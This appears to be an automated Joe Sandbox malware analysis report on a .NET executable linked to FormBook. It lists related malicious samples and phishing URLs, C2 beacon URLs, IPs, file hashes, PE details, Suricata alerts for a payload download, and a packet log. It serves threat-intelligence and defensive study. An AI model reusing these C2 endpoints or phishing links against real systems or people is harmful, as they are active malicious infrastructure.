                                                Behavior and APIs

                                                TimeTypeDescription
                                                09:44:22API Interceptor6512485x Sleep call for process: rasdial.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                217.160.0.231bin.exeGet hashmaliciousFormBookBrowse
                                                  Euskaltren Tren Metro Tranv#U00eda_v1.21_apkgk.com.apkGet hashmaliciousUnknownBrowse
                                                    162.0.238.43bin.exeGet hashmaliciousFormBookBrowse
                                                    • www.withad.xyz/r0nv/
                                                    rfOfF6s6gI.exeGet hashmaliciousFormBookBrowse
                                                    • www.heolty.xyz/sr8n/
                                                    4qV0xW2NSj.exeGet hashmaliciousFormBookBrowse
                                                    • www.heolty.xyz/sr8n/
                                                    sBX8VM67ZE.exeGet hashmaliciousFormBookBrowse
                                                    • www.heolty.life/niik/
                                                    DHL_AWB#6078538091.exeGet hashmaliciousFormBookBrowse
                                                    • www.heolty.xyz/sr8n/
                                                    DHL_AWB#6078538091.exeGet hashmaliciousFormBookBrowse
                                                    • www.heolty.xyz/sr8n/
                                                    LisectAVT_2403002B_412.exeGet hashmaliciousFormBookBrowse
                                                    • www.saterite.xyz/drbb/
                                                    NEW RFQ - Viasat LSDR.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • www.heolty.xyz/sr8n/?vXuxe=ykhS0NzI1a5mGwbAHDIJ/kn0uPnJkGx8yP6LKwuh8PX4fvfzVF0WIFVN62SFPKKg+p/2FhJS4HQ3sh57FrIEB5eRfyG1W8NKTOZpjTwWY1xkCHV8CA==&xPN=kZVT_
                                                    Att00173994.exeGet hashmaliciousFormBookBrowse
                                                    • www.heolty.xyz/sr8n/
                                                    8hd98EhtIFcYkb8.exeGet hashmaliciousFormBookBrowse
                                                    • www.tufftiff.xyz/vwgn/
                                                    136.143.186.12bin.exeGet hashmaliciousFormBookBrowse
                                                    • www.lanxuanz.tech/em49/
                                                    PR44238-43433.exeGet hashmaliciousFormBookBrowse
                                                    • www.jrksa.info/nq8t/
                                                    w3xlXm0r8W.exeGet hashmaliciousFormBookBrowse
                                                    • www.novaminds.online/ephb/?xN6PGj=vLmbgoHRNfK6ITOjmiLFGNRbChMUzx7XLdCca8olfY2Nxc16AQQbup47Ltpv+Aaivc7Y&_0DPe6=UHL0NdrXCvl
                                                    RFQ-9877678-9988876509886546887.exeGet hashmaliciousFormBookBrowse
                                                    • www.jrksa.info/nq8t/
                                                    RFQ-9877678-9988876509886546884.exeGet hashmaliciousFormBookBrowse
                                                    • www.jrksa.info/nq8t/
                                                    H25iQbxCki.exeGet hashmaliciousFormBookBrowse
                                                    • www.jrksa.info/mcz6/
                                                    RFQ 5654077845567895504_d0c.exeGet hashmaliciousFormBookBrowse
                                                    • www.jrksa.info/nq8t/
                                                    VSL_BUNKER INQUIRY.exeGet hashmaliciousFormBookBrowse
                                                    • www.topscaleservices.com/uyud/?4PB=a4DuWa1aWcmJH21/SNxRR+JRQb1v/kzaj3WKu4zLUxUUlKGTu9D1sWAogGI9gEZiY1gr5T6O35XBnrIr/I/ZCy9af96nyleFJwK0nJryK+5dgXb3T0bI8KcvkRm3LjrqBQ==&wdZh=n2Ih08C05RZDa
                                                    SCAN_0033245554672760018765524126524_pdf.exeGet hashmaliciousFormBookBrowse
                                                    • www.jrksa.info/nq8t/
                                                    PAYMENT COPY.exeGet hashmaliciousFormBookBrowse
                                                    • www.topscaleservices.com/uyud/?VlEHDVvh=a4DuWa1aWcmJH21/SNxRR+JRQb1v/kzaj3WKu4zLUxUUlKGTu9D1sWAogGI9gEZiY1gr5T6O35XBnrIr/I/ZCy9af/SljyarCQCdkJfuLPpdjFvVaxfdqpU=&BHPD=o2nt
                                                    38.47.232.196bin.exeGet hashmaliciousFormBookBrowse
                                                    • www.zz82x.top/ym8o/

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    epsys.roitem specification.vbsGet hashmaliciousFormBookBrowse
                                                    • 89.42.218.72
                                                    www.coffee-and-blends.infobin.exeGet hashmaliciousFormBookBrowse
                                                    • 217.160.0.231
                                                    zhs.zohosites.combin.exeGet hashmaliciousFormBookBrowse
                                                    • 136.143.186.12
                                                    PR44238-43433.exeGet hashmaliciousFormBookBrowse
                                                    • 136.143.186.12
                                                    w3xlXm0r8W.exeGet hashmaliciousFormBookBrowse
                                                    • 136.143.186.12
                                                    RFQ-9877678-9988876509886546887.exeGet hashmaliciousFormBookBrowse
                                                    • 136.143.186.12
                                                    RFQ-9877678-9988876509886546884.exeGet hashmaliciousFormBookBrowse
                                                    • 136.143.186.12
                                                    VSL_BUNKER INQUIRY.exeGet hashmaliciousFormBookBrowse
                                                    • 136.143.180.12
                                                    eNXDCIvEXI.exeGet hashmaliciousFormBookBrowse
                                                    • 136.143.180.12
                                                    H25iQbxCki.exeGet hashmaliciousFormBookBrowse
                                                    • 136.143.186.12
                                                    RFQ 5654077845567895504_d0c.exeGet hashmaliciousFormBookBrowse
                                                    • 136.143.186.12
                                                    VSL_BUNKER INQUIRY.exeGet hashmaliciousFormBookBrowse
                                                    • 136.143.186.12
                                                    www.withad.xyzbin.exeGet hashmaliciousFormBookBrowse
                                                    • 162.0.238.43

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    ONEANDONE-ASBrauerstrasse48DEbin.exeGet hashmaliciousFormBookBrowse
                                                    • 217.160.0.231
                                                    Remittance advice.exeGet hashmaliciousFormBookBrowse
                                                    • 217.76.156.252
                                                    https://mapetiterainbow.com/oldsite/Scejh/tSAML12%%ORandStr,1-1,0-4,L,10%%%5D/!!!TEMPLATE(S)%20ERROR:%20TEMPLATE(S)%20ENCLOSED%20IN%20'%5B%%'%20AND%20'%%%5D'%20INCORRECTLY!!!a%7Ce%7Ci%7Co%7Cu%%%5Ddp/%5B%%resume%7Cstart%7Cend%7Cpause%7Cbegin%%%5DSSO?id=%5B%%Base64,Email%%%5D&apis=%5B%%ORandStr,120-135,0-z,R,1%%%5DGet hashmaliciousUnknownBrowse
                                                    • 82.223.217.194
                                                    http://ceiam.esGet hashmaliciousUnknownBrowse
                                                    • 217.76.130.96
                                                    https://support-help.co.uk/Get hashmaliciousUnknownBrowse
                                                    • 217.160.0.246
                                                    myfile.exeGet hashmaliciousSodinokibi, Chaos, Netwalker, Revil, TrojanRansomBrowse
                                                    • 217.160.0.18
                                                    http://www.glasgowmobiletyres.comGet hashmaliciousUnknownBrowse
                                                    • 217.160.0.104
                                                    https://get.hidrive.com/SdwXVw64Get hashmaliciousUnknownBrowse
                                                    • 217.160.200.101
                                                    New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                    • 217.160.0.127
                                                    Scan 00093847.exeGet hashmaliciousFormBookBrowse
                                                    • 217.160.0.127
                                                    COGENT-174USbin.exeGet hashmaliciousFormBookBrowse
                                                    • 154.23.184.60
                                                    DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                                                    • 206.119.82.134
                                                    https://cartoon-kingdom.frGet hashmaliciousUnknownBrowse
                                                    • 154.62.106.123
                                                    Payment confirmation 20240911.exeGet hashmaliciousFormBookBrowse
                                                    • 154.23.184.240
                                                    Remittance advice.exeGet hashmaliciousFormBookBrowse
                                                    • 154.23.184.141
                                                    http://web.telgram.lol/Get hashmaliciousUnknownBrowse
                                                    • 154.44.30.138
                                                    SecuriteInfo.com.Linux.Mirai.5660.4284.15760.elfGet hashmaliciousUnknownBrowse
                                                    • 38.54.17.111
                                                    SecuriteInfo.com.Linux.Mirai.5074.32184.7525.elfGet hashmaliciousUnknownBrowse
                                                    • 38.54.17.111
                                                    SecuriteInfo.com.Linux.Mirai.5074.23844.14740.elfGet hashmaliciousUnknownBrowse
                                                    • 38.54.16.59
                                                    September Order.exeGet hashmaliciousFormBookBrowse
                                                    • 154.23.184.60
                                                    ZOHO-ASUSbin.exeGet hashmaliciousFormBookBrowse
                                                    • 136.143.186.12
                                                    https://americanathletic.zohodesk.com/portal/en/kb/articles/secure-business-documentsGet hashmaliciousUnknownBrowse
                                                    • 136.143.191.172
                                                    x86.elfGet hashmaliciousUnknownBrowse
                                                    • 165.173.254.246
                                                    https://authenticatesrv.spiritproducts.net/ck1/2d6f.7c034e718db46b30/419a3880-5f16-11ef-b8e1-525400721611/9f8bdc6e12526302fc1bc1642c86f78252fda8c1/2?e=Nm%2BKwgX31zZZHmcYOfoRL7XItJEu0aj7qdUQZVkwW4SjJAvb0T0NYaII1ijFN8OsBsszx8gv12KAbT3RDPMeVw%2FbefV4L1yqgi%2FKG9lD6NQTrh%2BQ2ox9o1TV16RIuHKxGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                    • 204.141.42.213
                                                    https://insights.zohorecruit.com/ck1/2d6f.390d3f0/fab65c60-5e29-11ef-896b-525400d6cd4f/02e60029eb3c4e09f8e3cb9644fa23262f52aa86/2?e=arqOrxEM1Pu0aMl2J4DeUujZWH3TPRnuK%2F%2F50IkkynofyG9S9LzMCQGQeD3A8%2BvCqigeqgLnvt4AorXAOg1unw%3D%3DGet hashmaliciousUnknownBrowse
                                                    • 204.141.42.213
                                                    http://workdrive.zohoexternal.comGet hashmaliciousUnknownBrowse
                                                    • 204.141.43.16
                                                    https://workdrive.zohoexternal.com/external/writer/46fdf68b2f78265d07797e09c63aeef4064c3374cfc014062660688cb6876b9bGet hashmaliciousUnknownBrowse
                                                    • 204.141.43.16
                                                    https://diverescueintl.com/Get hashmaliciousHTMLPhisherBrowse
                                                    • 204.141.43.67
                                                    https://mail.osd.is/ahoy/v1/messages/tmUud75kaX5i84jrSddi7RvRoEwnRvGI/click?signature=365a74d8cf6aaa475deb70de401d91b3730068bd&url=https%3A%2F%2Fclicks.behanbros.com%2Fck1%2F2d6f.1666ed262aa69c30%2F85235e80-5a3c-11ef-aa46-525400e18d05%2F1aecbc6e17a7f32f257de147fdcb114dbde4bd0f%2F2%3Fe%3DFl%252F%252FoUXSWwF4eWEmDhD8bO767DIweN%252FgbynhnWQQmfCORP5QUcVtfSPOtr6%252BDxnpoDuQRdtqwnyF1KluaSYTaR5UeBEE6yffkypjSqmL7J5ipExtaLftHqKh%252Bzv8vTL5qyxfKjbZr99sma1YKqi%252BfzRl17ovpu6A5oDfKTScZKLDd12RZf6UCFYMHyoZPddgcbE6zuIJMb5qTeXnQnSyL77bJHrzBkIFTbFomV22oj2Sxfjmusf37%252FtRQJIonhWvmQ2eYZUHNrDGIKboriJd18Zdx8rSd83CHzT8YvPCIJeLAvnSG0%252Bbpl1MNIIFumjajHiG90XC2irPRPcW5GaTA%252BITIsF2wBg8CIBvVGEGwXo4JP3%252B8Onp5k1RR6k7BKW%252BqGlHBTGPuAxqoP%252Ff0cZzsNc21UGjnmx7wKErLb4FefcMhXTbRK3q8zETD9j%252FiR%252FLnM6uZibPZVB9o6ivg7AJj8bKpFnLyO4DwVX0BNeCbVAJFxoU%252BZ%252FZ39PxrsnfftlrJkRaLDKMH%252BxTiRDaunilyq4JKe0%252BcbtfKZUAa27j2VFwYwqEjlzGnrX5%252Fdou7iokpKv8aEs8pQ%252BQIV2dR4YqT%252B5vCkp3w6nguoVaO3EoNbbCRozXu1Ic0kXeinEPwDg3l1%252BY%252FBli4EK0EedpP4%252BP0v3jxxncnqIhYIj45CpXHI88Qx5mocDHAgYzq2CBlrn%252FcsWWOshJql5b6xAr8pq6FNrXoiOolx1VvwyFY8HnDgG9gKxZtCrQP3IS4iN412x0hygoxuA99srteXs7BDcl5V6J3whqQPl%252BznVvdxEPQFxDwIxzw9RUXXdGay00DF%252FLAKov2ZuUmlBbZsW94VCaHg%253D%253DGet hashmaliciousHTMLPhisherBrowse
                                                    • 204.141.42.213
                                                    3533cdbe-ace4-ee24-ff8f-a6fbfe7cf297.emlGet hashmaliciousHTMLPhisherBrowse
                                                    • 204.141.43.178
                                                    NAMECHEAP-NETUSbin.exeGet hashmaliciousFormBookBrowse
                                                    • 162.0.238.43
                                                    Order#Qxz091124.exeGet hashmaliciousFormBookBrowse
                                                    • 162.0.236.169
                                                    INV & BANK DETAILS LETTER.pdf.exeGet hashmaliciousFormBookBrowse
                                                    • 199.192.21.169
                                                    Remittance advice.exeGet hashmaliciousFormBookBrowse
                                                    • 162.0.239.141
                                                    http://gulf-uae.com/953442816569005250060051bi2sxgen-pgx-878723564006-ifxyeonkim-isxskyline-holt.comsf-1MC4wGet hashmaliciousHTMLPhisherBrowse
                                                    • 185.61.154.40
                                                    https://croarderde-f58dcd.ingress-baronn.ewp.live/wp-content/plugins/P-egeneceler/pages/region.phpGet hashmaliciousUnknownBrowse
                                                    • 63.250.43.10
                                                    http://gulf-uae.com/544357236488404200309078bi2sxgen-pgx-512994112049-ifxtami-isxgheenirrigation.comsf-1MC4wGet hashmaliciousHTMLPhisherBrowse
                                                    • 185.61.154.40
                                                    file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
                                                    • 198.54.120.231
                                                    September Order.exeGet hashmaliciousFormBookBrowse
                                                    • 199.192.19.19
                                                    file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
                                                    • 198.54.120.231

                                                    JA3 Fingerprints

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    3b5074b1b5d032e5620f69f9f700ff0eMV TBN CALL PORT FOR LOADING COAL_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 89.42.218.72
                                                    item specification.vbsGet hashmaliciousFormBookBrowse
                                                    • 89.42.218.72
                                                    Outstanding-Invoices 001445.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 89.42.218.72
                                                    PO__20248099-1 12,300PCS.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 89.42.218.72
                                                    Statement of Account as of AUGUST 2024SOA.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 89.42.218.72
                                                    Proforma invoices_1.jsGet hashmaliciousUnknownBrowse
                                                    • 89.42.218.72
                                                    https://anton-paar-p.e-jelenlet.huGet hashmaliciousUnknownBrowse
                                                    • 89.42.218.72
                                                    https://www.izmailovo.ru/contacts/Get hashmaliciousHTMLPhisherBrowse
                                                    • 89.42.218.72
                                                    JeZHGKJvrB.exeGet hashmaliciousUnknownBrowse
                                                    • 89.42.218.72

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\x.exe.log

                                                    Download File
                                                    Process:C:\Users\user\Desktop\x.exe
                                                    File Type:CSV text
                                                    Category:dropped
                                                    Size (bytes):847
                                                    Entropy (8bit):5.345615485833535
                                                    Encrypted:false
                                                    SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                                                    MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                                                    SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                                                    SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                                                    SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                                                    Malicious:true
                                                    Reputation:moderate, very likely benign file
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

                                                    C:\Users\user\AppData\Local\Temp\48663I1M

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\rasdial.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                    Category:dropped
                                                    Size (bytes):196608
                                                    Entropy (8bit):1.1209886597424439
                                                    Encrypted:false
                                                    SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                    MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                    SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                    SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                    SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):6.082167710127673
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    • DOS Executable Generic (2002/1) 0.01%
                                                    File name:x.exe
                                                    File size:24'576 bytes
                                                    MD5:ba5ee405d2cc8ef536634c4e8e4bf0cb
                                                    SHA1:c91ab3aba77a079926a28cabe247b5e6db3e59fe
                                                    SHA256:69d7e14e2d5fc77e347add9b897623a3615e1c9c483f9ef408b59ec44024fe94
                                                    SHA512:260ae119f4b59d5aeb583600e24a7eb1228b6389454cab9a3eff91b1a9543494d206be0ded4144e541d60b354d4fc1a6f9ac52caa317eba794320245c7e59a88
                                                    SSDEEP:384:LH09Fh+MaeWZJF5OB41GfefiyajWxbth2O6YGe1A3HTJruelJskELNFd:shyeW7OBqiHO363zJruCX8/
                                                    TLSH:BDB25C8677ED972BC3ACA7BE89B611880734C3657A53C3CAAEA0514E1D837DD7101F16
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0..V...\......Jt... ........@.. ....................................`................................

                                                    File Icon

                                                    Icon Hash:00928e8e8686b000

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x40744a
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x66E0FD8C [Wed Sep 11 02:16:44 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x73f00x57.text
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xa0000x5b8.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x80000xc.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x42000x1c.text
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x20000x54500x5600993e078b43ef2f70e6fea0e60816367dFalse0.6016533430232558data6.300812789403103IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .reloc0x80000xc0x200b75c6cf1ba24f4c92d1fc7bab8379760False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                    .rsrc0xa0000x5b80x60080f310006036e90ab670131ccb65bb67False0.4225260416666667data4.149945226374254IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_VERSION0xa0a00x32cdata0.42610837438423643
                                                    RT_MANIFEST0xa3cc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                    Imports

                                                    DLLImport
                                                    mscoree.dll_CorExeMain

                                                    Network Behavior

                                                    Suricata IDS Alerts

                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                    2024-09-11T15:43:06.003455+02002019696ET MALWARE Possible MalDoc Payload Download Nov 11 20141192.168.2.84970689.42.218.72443TCP
                                                    2024-09-11T15:43:06.003455+02002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.84970689.42.218.72443TCP
                                                    2024-09-11T15:43:07.565181+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.84970789.42.218.72443TCP

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Sep 11, 2024 15:43:04.943248987 CEST49706443192.168.2.889.42.218.72
                                                    Sep 11, 2024 15:43:04.943341970 CEST4434970689.42.218.72192.168.2.8
                                                    Sep 11, 2024 15:43:04.943453074 CEST49706443192.168.2.889.42.218.72
                                                    Sep 11, 2024 15:43:04.952512980 CEST49706443192.168.2.889.42.218.72
                                                    Sep 11, 2024 15:43:04.952548981 CEST4434970689.42.218.72192.168.2.8
                                                    Sep 11, 2024 15:43:05.646543026 CEST4434970689.42.218.72192.168.2.8
                                                    Sep 11, 2024 15:43:05.646652937 CEST49706443192.168.2.889.42.218.72
                                                    Sep 11, 2024 15:43:05.672270060 CEST49706443192.168.2.889.42.218.72
                                                    Sep 11, 2024 15:43:05.672313929 CEST4434970689.42.218.72192.168.2.8
                                                    Sep 11, 2024 15:43:05.672709942 CEST4434970689.42.218.72192.168.2.8
                                                    Sep 11, 2024 15:43:05.721957922 CEST49706443192.168.2.889.42.218.72
                                                    Sep 11, 2024 15:43:05.725754023 CEST49706443192.168.2.889.42.218.72
                                                    Sep 11, 2024 15:43:05.771401882 CEST4434970689.42.218.72192.168.2.8
                                                    Sep 11, 2024 15:43:06.003509045 CEST4434970689.42.218.72192.168.2.8
                                                    Sep 11, 2024 15:43:06.050009012 CEST49706443192.168.2.889.42.218.72
                                                    Sep 11, 2024 15:43:06.118448019 CEST4434970689.42.218.72192.168.2.8
                                                    Sep 11, 2024 15:43:06.118468046 CEST4434970689.42.218.72192.168.2.8
                                                    Sep 11, 2024 15:43:06.118529081 CEST4434970689.42.218.72192.168.2.8
                                                    Sep 11, 2024 15:43:06.118552923 CEST4434970689.42.218.72192.168.2.8
                                                    Sep 11, 2024 15:43:06.118577003 CEST4434970689.42.218.72192.168.2.8
                                                    Sep 11, 2024 15:43:06.118654966 CEST49706443192.168.2.889.42.218.72
                                                    Sep 11, 2024 15:43:06.118731022 CEST4434970689.42.218.72192.168.2.8
                                                    Sep 11, 2024 15:43:06.118769884 CEST49706443192.168.2.889.42.218.72
                                                    Sep 11, 2024 15:43:06.118817091 CEST49706443192.168.2.889.42.218.72
                                                    Sep 11, 2024 15:43:06.120454073 CEST4434970689.42.218.72192.168.2.8
                                                    Sep 11, 2024 15:43:06.120466948 CEST4434970689.42.218.72192.168.2.8
                                                    Sep 11, 2024 15:43:06.120496035 CEST4434970689.42.218.72192.168.2.8
                                                    Sep 11, 2024 15:43:06.120546103 CEST49706443192.168.2.889.42.218.72
                                                    Sep 11, 2024 15:43:06.120569944 CEST4434970689.42.218.72192.168.2.8
                                                    Sep 11, 2024 15:43:06.120595932 CEST49706443192.168.2.889.42.218.72
                                                    Sep 11, 2024 15:43:06.120636940 CEST49706443192.168.2.889.42.218.72
                                                    Sep 11, 2024 15:43:06.235493898 CEST4434970689.42.218.72192.168.2.8
                                                    Sep 11, 2024 15:43:06.235544920 CEST4434970689.42.218.72192.168.2.8
                                                    Sep 11, 2024 15:43:06.235666990 CEST49706443192.168.2.889.42.218.72
                                                    Sep 11, 2024 15:43:06.235701084 CEST4434970689.42.218.72192.168.2.8
                                                    Sep 11, 2024 15:43:06.235754013 CEST49706443192.168.2.889.42.218.72
                                                    Sep 11, 2024 15:43:06.236299992 CEST4434970689.42.218.72192.168.2.8
                                                    Sep 11, 2024 15:43:06.236339092 CEST4434970689.42.218.72192.168.2.8
                                                    Sep 11, 2024 15:43:06.236391068 CEST49706443192.168.2.889.42.218.72
                                                    Sep 11, 2024 15:43:06.236397982 CEST4434970689.42.218.72192.168.2.8
